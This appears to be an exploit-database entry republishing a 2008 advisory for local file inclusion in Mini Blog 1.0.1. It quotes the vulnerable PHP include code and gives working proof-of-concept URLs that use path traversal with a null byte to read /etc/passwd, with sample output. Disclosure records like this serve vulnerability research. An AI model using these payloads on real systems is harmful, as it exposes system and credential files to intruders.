header-logo
Suggest Exploit
vendor:
Mini Blog
by:
cOndemned
7.5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: Mini Blog
Affected Version From: 1.0.1
Affected Version To: 1.0.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Mini Blog 1.0.1 (index.php) Multiple Local File Inclusion Vulnerabilities

Mini Blog 1.0.1 is vulnerable to multiple local file inclusion vulnerabilities due to insufficient sanitization of user-supplied input to the 'page' and 'admin' parameters of the 'index.php' script. An attacker can exploit this vulnerability to include arbitrary local files and execute arbitrary code on the vulnerable system.

Mitigation:

Input validation should be used to prevent the inclusion of arbitrary files.
Source

Exploit-DB raw data:

/*

	$Id: miniblog-1.0.1-lfi.txt,v 0.1 2008/12/06 04:06:00 cOndemned Exp $
	
	Mini Blog 1.0.1 (index.php) Multiple Local File Inclusion Vulnerabilities
	Discovered by cOndemned

	Download : http://www.bpowerhouse.info/mini_blog.htm
	
	Greetz : ZaBeaTy, str0ke, d2, sid.psycho, Adish, TBH & Avantura ;*

*/

Source of index.php

	[...]

	7.	$page = !empty($_GET['page']) ? $_GET['page'] : "";
	8.	$admin = !empty($_GET['admin']) ? $_GET['admin'] : "";
	
	[...]
	
	77.	if (($page != "") && file_exists("page/" . $page . ".php")) {
	78.		require("page/" . $page . ".php");
	79.	} else if (($admin != "") && file_exists("admin/" . $admin . ".php")) {
	80.		require("admin/" . $admin . ".php");

	[...]
	

Proof of Concept

	http://[host]/[mini_blog_1.0.1_path]/index.php?page=../../../../[local_file]%00
	http://[host]/[mini_blog_1.0.1_path]/index.php?admin=../../../../[local_file]%00
	
	for example request :
	
	http://[host]/[mini_blog_1.0.1_path]/index.php?page=../../../../../etc/passwd%00
	
	...might give result like this :

	root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon...
	
	
EoF

# milw0rm.com [2008-12-07]

Navigation

Suggest Exploit

Services By CQR